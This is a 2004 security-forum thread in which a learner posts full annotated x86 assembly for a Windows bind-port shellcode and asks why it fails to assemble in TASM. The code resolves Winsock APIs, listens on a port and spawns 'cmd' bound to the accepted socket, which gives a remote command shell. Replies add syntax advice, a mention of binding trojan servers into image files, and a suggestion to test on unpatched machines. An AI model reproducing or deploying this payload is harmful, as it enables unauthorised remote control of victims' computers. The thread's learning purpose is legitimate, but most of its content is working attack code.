-
November 9th, 2004, 09:39 AM
#1
exploits and asm :getting started.
phrack 6.2's article on advances in windows overflow http://phrack.org/show.php?p=62&a=7
is great. Some really advanced topics are covered by it; it gives you examples on how to proceed, and source code is available at http://www.scan-associates.net/papers/one-way.zip
I am new at asm (never enjoyed it, to be honest), but in the one-way.zip file there is asm source code for shellcodes. Here is one of those source files:
----------------------------------------------------------
;bind to port shellcode
;port at 0x134
;sk scan-associates net
;
; Structure of this listing (32-bit x86, Win32 stdcall calls):
;   1. GetPC stub, then the stack is relocated below the code (ebp = scratch area)
;   2. XOR decoder over everything after it (key byte is 0 in this listing)
;   3. inline string table of API names, reached via `call here`
;   4. kernel32 base found by scanning down from a hard-coded address, then a
;      manual export-table walk to locate GetProcAddress
;   5. remaining imports resolved by name; the resolved addresses are written
;      over the start of the string table, and every `call dword ptr [edi-N]`
;      below indexes that table relative to edi
;   6. WSASocketA / bind / listen / accept, then CreateProcessA("cmd") with all
;      three std handles set to the accepted socket; ExitProcess on any failure
; Analyst notes: the kernel32 base is a hard-coded assumption (see the author's
; warning below), the API names are stored in clear text, and the code writes
; into its own bytes (decoder, address table), so it needs a writable and
; executable region.
.386p
locals
.model flat, stdcall
.code
start:
; GetPC: the first jmp skips the second; the call pushes the address of
; `pop eax` and lands on the skipped jmp, which jumps forward to `pop eax`.
db 0ebh,02 ;jmp $+2
db 0ebh, 05h ;jmp $+5
db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7
pop eax ; eax = address of this instruction
; 1bh = byte distance from `pop eax` to the first byte after `loop decode`
; (sum of the instruction encodings below), so decoding starts at `call here`.
add eax, 1bh
; Relocate the stack 3ffh bytes below the code, 4-aligned; ebp keeps this
; address and is reused as scratch storage (sockaddr_in, then STARTUPINFO).
lea esp,[eax-3ffh]
and esp, 0fffffffch
mov ebp,esp
xor ecx,ecx
mov cx,399 ;size
; XOR decoder over cx bytes starting at eax. The key byte is 0 here, so this
; pass is a no-op as listed; an encoder would patch the key and the size.
decode:
xor byte ptr [eax], 0
inc eax
loop decode
; `call here` pushes the address of the string table that follows it; `here`
; pops that address into edx.
call here
db "GetProcAddress",0,"LoadLibraryA",0
db "CreateProcessA",0,"ExitProcess",0
db "ws2_32",0,"WSASocketA",0
db "bind",0,"listen",0,"accept",0
db "cmd",0
;Warning! This will not work in Win2k SP4! Check reverse.asm for a better trick to get Kernel32
here:
pop edx ; edx = string table
push edx ; kept on the stack; popped into esi once GetProcAddress is found
; Find kernel32: scan downwards one byte at a time from 77F00000h until the
; dword "MZ",90h,0 is seen. Hard-coded base assumption -> see warning above.
mov ebx,77F00000h
l1:
cmp dword ptr [ebx],905A4Dh ;/x90ZM
je l2
;db 74h,03h ; raw-byte form of the `je l2` above (rel8 = 3 skips dec ebx / jmp l1)
dec ebx
jmp l1
l2:
; PE walk with ebx = image base.
mov esi,dword ptr [ebx+3Ch] ; e_lfanew
add esi,ebx ; esi = PE header
mov esi,dword ptr [esi+78h] ; export directory RVA (first DataDirectory entry)
add esi,ebx ; esi = IMAGE_EXPORT_DIRECTORY
mov edi,dword ptr [esi+20h] ; AddressOfNames RVA
add edi,ebx
mov ecx,dword ptr [esi+14h] ; NumberOfFunctions, used as the bound of the name loop
push esi ; export directory, restored at l3
xor eax,eax ; eax = index of the current name
; For each exported name, compare its first 0Eh bytes with "GetProcAddress".
l4:
push edi
push ecx
mov edi,dword ptr [edi]
add edi,ebx ; edi = current name string
mov esi,edx ; esi = "GetProcAddress" in the string table
xor ecx,ecx
;GetProcAddress
mov cl,0Eh ; length of "GetProcAddress"
repe cmps byte ptr [esi],byte ptr [edi]
pop ecx
pop edi
je l3 ; ZF from the last cmps: all 0Eh bytes matched
add edi,4 ; next AddressOfNames entry
inc eax
loop l4
jmp ecx ; reached only if no name matched; ecx is 0 here after the loop exhausts
l3:
pop esi ; esi = export directory
mov edx,dword ptr [esi+24h] ; AddressOfNameOrdinals RVA
add edx,ebx
shl eax,1 ; ordinal table holds WORD entries
add eax,edx
xor ecx,ecx
mov cx,word ptr [eax] ; cx = ordinal of the matched name
mov eax,dword ptr [esi+1Ch] ; AddressOfFunctions RVA
add eax,ebx
shl ecx,2 ; function table holds DWORD entries
add eax,ecx
mov edx,dword ptr [eax]
add edx,ebx ; edx = GetProcAddress; edx keeps it for the rest of the code
pop esi ; esi = string table (pushed at `here`)
; edi also starts at the string table: loadaddr stores each resolved address
; with stosd, so the first 28 bytes ("GetProcAddress",0,"LoadLibraryA",0) are
; replaced by a 7-entry address table. The `call dword ptr [edi-N]` sites
; below address that table relative to edi's final position.
mov edi,esi
xor ecx,ecx
;Get 3 Addr
mov cl,3
; Resolves LoadLibraryA, CreateProcessA, ExitProcess from kernel32 (ebx).
; loadaddr skips the string esi points at before resolving, so the
; "GetProcAddress" entry is stepped over and esi returns at "ExitProcess".
call loadaddr
add esi,0Ch ; skip "ExitProcess",0 -> esi = "ws2_32"
;Load ws2_32
push edx ; edx is caller-saved in stdcall; preserve GetProcAddress across the call
push esi
call dword ptr [edi-0Ch] ;LoadLibraryA
pop edx
mov ebx,eax ; ebx = ws2_32 module handle for the next resolutions
xor ecx,ecx
mov cl,4
; Resolves WSASocketA, bind, listen, accept; esi returns at "accept".
call loadaddr
add esi,7 ; skip "accept",0 -> esi = "cmd"
; WSASocketA(af=2, type=1, protocol=0, lpProtocolInfo=0, g=0, dwFlags=0)
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call dword ptr [edi-16] ;WSASocketA
cmp eax,0FFFFFFFFh ; INVALID_SOCKET
je exit
;bind, listen, accept
mov ebx,eax ; ebx = listening socket
; sockaddr_in at [ebp]: family 2, port word stored as bytes 00 50 (port 80 in
; network byte order), address 0.
mov word ptr [ebp],2
mov word ptr [ebp+2],5000h ;port
mov dword ptr [ebp+4], 0 ;IP
push 10h ; sizeof(sockaddr_in)
push ebp
push ebx
call dword ptr [edi-12] ;bind
test eax,eax
jne exit
inc eax ; eax = 1 = backlog
push eax
push ebx
call dword ptr [edi-8] ;listen (soc, 1);
test eax,eax
jne exit
push eax ; addrlen = NULL
push eax ; addr = NULL
push ebx
call dword ptr [edi-4] ;accept
cmp eax,0FFFFFFFFh
je exit
mov ebx,eax ; ebx = accepted connection socket
; Zero 11h dwords (44h bytes = sizeof STARTUPINFOA) at ebp, then fill it in.
xor eax,eax
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi]
pop edi
mov byte ptr [ebp],44h ; cb
mov dword ptr [ebp+3Ch],ebx ; hStdOutput
mov dword ptr [ebp+38h],ebx ; hStdInput
mov dword ptr [ebp+40h],ebx ; hStdError
mov word ptr [ebp+2Ch],0101h ; dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW (wShowWindow stays 0)
lea eax,[ebp+44h] ; PROCESS_INFORMATION placed right after STARTUPINFO
; CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
; ecx is 0 here after the rep stos above.
push eax
push ebp
push ecx
push ecx
push ecx
inc ecx
push ecx ; bInheritHandles = 1, so the socket handles are inherited
dec ecx
push ecx
push ecx
push esi ; lpCommandLine = "cmd"
push ecx
call dword ptr [edi-24] ;CreateProcess
exit:
; ExitProcess(eax); also the error path for every failed call above
push eax
call dword ptr [edi-20] ;ExitProcess
;-----------------------------------------------------------------------
; loadaddr: resolve ecx exports by name
; In:   esi = a NUL-terminated string (skipped), followed by the ecx names
;       ebx = module handle, edx = GetProcAddress, edi = write cursor
; Out:  ecx dwords stored at edi (edi advances by 4 each); esi = start of the
;       last name resolved
; Clobbers: eax (last result), ecx (0 on return), flags
; Each iteration first advances esi past the current string, so the name
; handed to GetProcAddress is the one *after* the string esi pointed at.
;-----------------------------------------------------------------------
loadaddr:
mov al,byte ptr [esi]
inc esi
test al,al
jne loadaddr ; advance to the byte after the NUL
push ecx ; ecx/edx are caller-saved in stdcall; keep them across the call
push edx
push esi ; lpProcName
push ebx ; hModule
call edx
pop edx
pop ecx
stosd ; [edi] = resolved address; edi += 4
loop loadaddr
ret
end start
; The assembler stops at END, so this .data directive is never processed.
.data
----------------------------------------------------------
It is supposed to be used with TASM. I have Windows 98 and XP; I installed TASM on 98 and tried all of these source files, tried to create an obj file, but it doesn't work. Can anyone suggest why?
Maybe it will work fine on Linux, but what if I want to convert this to Windows or DOS format?
-
November 9th, 2004, 09:42 AM
#2
Bleh I'm prolly acting like a dick like this because it's late and I hate ASM but: this should really be in programming security. Anyways, that phrack article (to my knowledge) is old and outdated and the exploit you directed to might even be patched (probably is).
-
November 9th, 2004, 09:46 AM
#3
i don't care whether it is patched or not i just want to learn
-
November 9th, 2004, 09:50 AM
#4
Indeed, I'm thrilled you're looking to learn ASM and whatnot. However, reading outdated/old material isn't the way to go, no? Search AO and Google for some ASM tutorials (as a matter of fact, AO might have some links to some programming tutorial sites that are updated and aren't outdated.. I can't remember any off the top of my head right now).
-
November 9th, 2004, 10:02 AM
#5
I did that; I am starting with asm. Got some cool links from Google, tried Art of Assembly and so on.
As far as this thread is concerned, I just wanted to know why I am not able to run it with TASM in Win98?
-
November 9th, 2004, 10:13 AM
#6
/me wishes he could help you with that one, but can't because me dont use/code with ASM.
-
November 9th, 2004, 02:18 PM
#7
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 9th, 2004, 03:18 PM
#8
Originally posted here by SirDice
Any error messages?
Huhaha... nice joke, SirDice. That was a good one.
Well for starters and among various other potential problems, when you declare byte(s) of text like that it should be
.data
db "blah blah random text", 0
It should go to the .data section of your source, which is at the bottom of your post; the text is somewhere in the top/middle area of it all. Really, stuff like .data, .data?, .const, etc. would all normally be prepared, declared, ready, and done before you begin the .code portion of the source code. Oh yeah and Spyder, kiss my ass! Go do something lame and imaginary like bind a *.jpg file with beast or BO2k servers.
Originally posted here by Spyder32
No doubt. You most likely find viruses inside of a .jpg file because it's harder to detect and/or wouldn't be thought of as containing a virus. There are specific binding applications out there designed to bind two files together, specifically a .jpg and a .exe. Hope that provided some insight for you.
-
November 9th, 2004, 07:13 PM
#9
littlenick,
i don't care whether it is patched or not i just want to learn
Well you ought to care. If the machine is patched then the exploit won't work, and if it is your primary computer that you use to access the net it certainly should be patched. Or you will certainly learn.......the hard way!!!
You need to get yourself an old box, PI/PII or even a later 486. Load an UNPATCHED version of an OS such as Win NT4 or Win98. Then try your experiments. Then gradually apply the patches and see what they do.
You certainly don't want to be doing this sort of research on your main machine............things can go wrong.